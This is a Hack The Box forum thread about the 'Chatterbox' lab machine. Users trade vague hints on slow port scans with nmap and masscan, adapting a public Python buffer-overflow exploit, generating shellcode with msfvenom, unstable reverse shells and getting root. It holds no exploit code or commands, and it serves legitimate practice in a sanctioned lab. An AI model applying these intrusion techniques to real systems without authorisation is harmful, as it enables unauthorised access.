Chatterbox

12357

Comments

  • you can use sparta for recon and enumeration, it's amazing toolkit.
    full port scan will reveal sufficient info for you to go ahead with.
    I am stuck with the exploit right now, wasted 2 days to figure out what is missing.

  • ok so I got root.txt without actually spawning an Administrative shell. I'd like to understand how to go about using the privileges I have to get an interactive shell as Admin. Anybody willing to PM me a hint to point me in the right direction?

  • @peek said:
    try allports

    Great advice if you could even scan the thing without being fucked over by reset. Sorry for the language but I've spent weeks on this piece of crap, even wrote scripts to automatically scan small blocks of ports spanning the entire range just to find a single open port. Only to find zero in the morning.

  • For all of those complaining about the slow port scanning, I'd recommend reading up on some nmap flags/options to help get around what's causing the slow down. With the proper flags, you should be able to port scan the entire box fairly quickly.

  • Finally.
    ---->{P00F}!
    For real.

  • edited April 2018

    Tried nmap and masscan, several times, all ports, fast, and twice found one port, but not the same port, and all the other times just found nothing :/ even after reseting the box

    This box is driving me nuts

    Puerkito66

  • Nvm, F#ck this box.

    Puerkito66

  • Can I DM someone to help with payloads?

  • it would be lovely because chatterbox is requested to reset so much.

  • @puerkito66 said:
    Nvm, F#ck this box.

    My thoughts exactly. It took me days to find the port, and now days on days to figure out the payload and I'm still not there.

  • masscan shows me no port is opening, no matter my option (stealth scan, udp scan - for sure). is masscan that bad?

  • @dmknght said:
    masscan shows me no port is opening, no matter my option (stealth scan, udp scan - for sure). is masscan that bad?

    The problem with this box is that it can be exploited once at the time, the moment it's being exploited, the useful port become "invisible", it's better with a fresh reset :/

    Puerkito66

  • SPOILER: uncommon port, DON'T SPAM reset request.
    If your nmap is so slow, use this option --min-rate

  • Jeez, finally got a working shell that lasted longer than 20 seconds and rooted, glad to be over this one, the inconsistent shell was driving me mad

  • So when creating the payload, I've managed to get one to encode but the size is no where near 512.

    Tried a few different payloads as well as changing some of the buffer length.

    Sort of on the right track for a working buff ?

    KCSEC -- for Pentesting/hacking guides and Tools.

    https://www.ivoidwarranties.tech/ - KCSEC Website
    https://github.com/KCSEC
    https://www.facebook.com/KCovertSEC/

    Join the KCSEC HTB Team

    https://www.hackthebox.eu/home/teams/profile/655
    KCSEC

  • @IVWKCSEC said:
    So when creating the payload, I've managed to get one to encode but the size is no where near 512.

    Tried a few different payloads as well as changing some of the buffer length.

    Sort of on the right track for a working buff ?

    Does size really matter, at least in this case :) ?

  • @PencilTester said:
    Finally.
    ---->{P00F}!
    For real.

    I'm guessing you're talking about the python exploit.
    What does it do? I can't figure it out reading the source.

    SCP
    CEH, OSCP

  • @junior said:

    @IVWKCSEC said:
    So when creating the payload, I've managed to get one to encode but the size is no where near 512.

    Tried a few different payloads as well as changing some of the buffer length.

    Sort of on the right track for a working buff ?

    Does size really matter, at least in this case :) ?

    Haha thats what they all say !

    I've tried with a custom payload .. basic one of a shell_tcp but it never connects back.

    I'll have to keep trying /setup it in a local lab to get it working.

    KCSEC -- for Pentesting/hacking guides and Tools.

    https://www.ivoidwarranties.tech/ - KCSEC Website
    https://github.com/KCSEC
    https://www.facebook.com/KCovertSEC/

    Join the KCSEC HTB Team

    https://www.hackthebox.eu/home/teams/profile/655
    KCSEC

  • @scp said:

    @PencilTester said:
    Finally.
    ---->{P00F}!
    For real.

    I'm guessing you're talking about the python exploit.
    What does it do? I can't figure it out reading the source.

    Yes, Theres two key parts two it which it shows you in the comments.

    One the payload and the other the UDP port.

    Look up msf venom and the payload that's already there and see if you can figure out what it does and how it could be changed :)

    KCSEC -- for Pentesting/hacking guides and Tools.

    https://www.ivoidwarranties.tech/ - KCSEC Website
    https://github.com/KCSEC
    https://www.facebook.com/KCovertSEC/

    Join the KCSEC HTB Team

    https://www.hackthebox.eu/home/teams/profile/655
    KCSEC

  • NVM got some alternative shellcode
    No stable connection but able to grab user.txt

    SCP
    CEH, OSCP

  • Just a warning, i had both the valid exploit with valid shellcode, when the machine has just been reset it works fine, but any other time it just doesn't connect back.

    So just be aware, just because its not connecting or stable doesn't mean you are doing it wrong, it COULD be the machine... or it could be your shellcode. So if you aren't sure, install the software locally to test and confirm.

  • Got it , VPN IP had changed lol.
    Priv esc now

    KCSEC -- for Pentesting/hacking guides and Tools.

    https://www.ivoidwarranties.tech/ - KCSEC Website
    https://github.com/KCSEC
    https://www.facebook.com/KCovertSEC/

    Join the KCSEC HTB Team

    https://www.hackthebox.eu/home/teams/profile/655
    KCSEC

  • Can anyone help me with privesc? I'm totaly stuck. PM please.

  • man this box made me feel like an idiot. Really simple after the first step, don't think too hard trying to privesc.

    Looking for past Hack the Box write-ups or other security stuff? Feel free to visit: https://dastinia.io <3

  • can anyone pm me for the payload?

  • Got root. No need to privilege escalation. Just see where in windows shell is landing you.
  • has anyone managed through metasploit exploit? or does only python script work?

  • > @w31rd0 said:
    > has anyone managed through metasploit exploit? or does only python script work?

    Python was completely stable for me
  • Hello guys,

    I am stuck on the epxloit. I found the ports, and the exploit in python which use a simple shell code. I generate another one with msfvenom but doesn't work. Can some one help me please? This is my first challenge here and I am really lost

    Thanks

  • edited May 2018
    For the people who still have problems with the payload, you do not need to make 
    sessions migration. ShellPayload is enough to become user and root .. find the right 
    payload and change advanced option ... then you have it
    
Sign In to comment.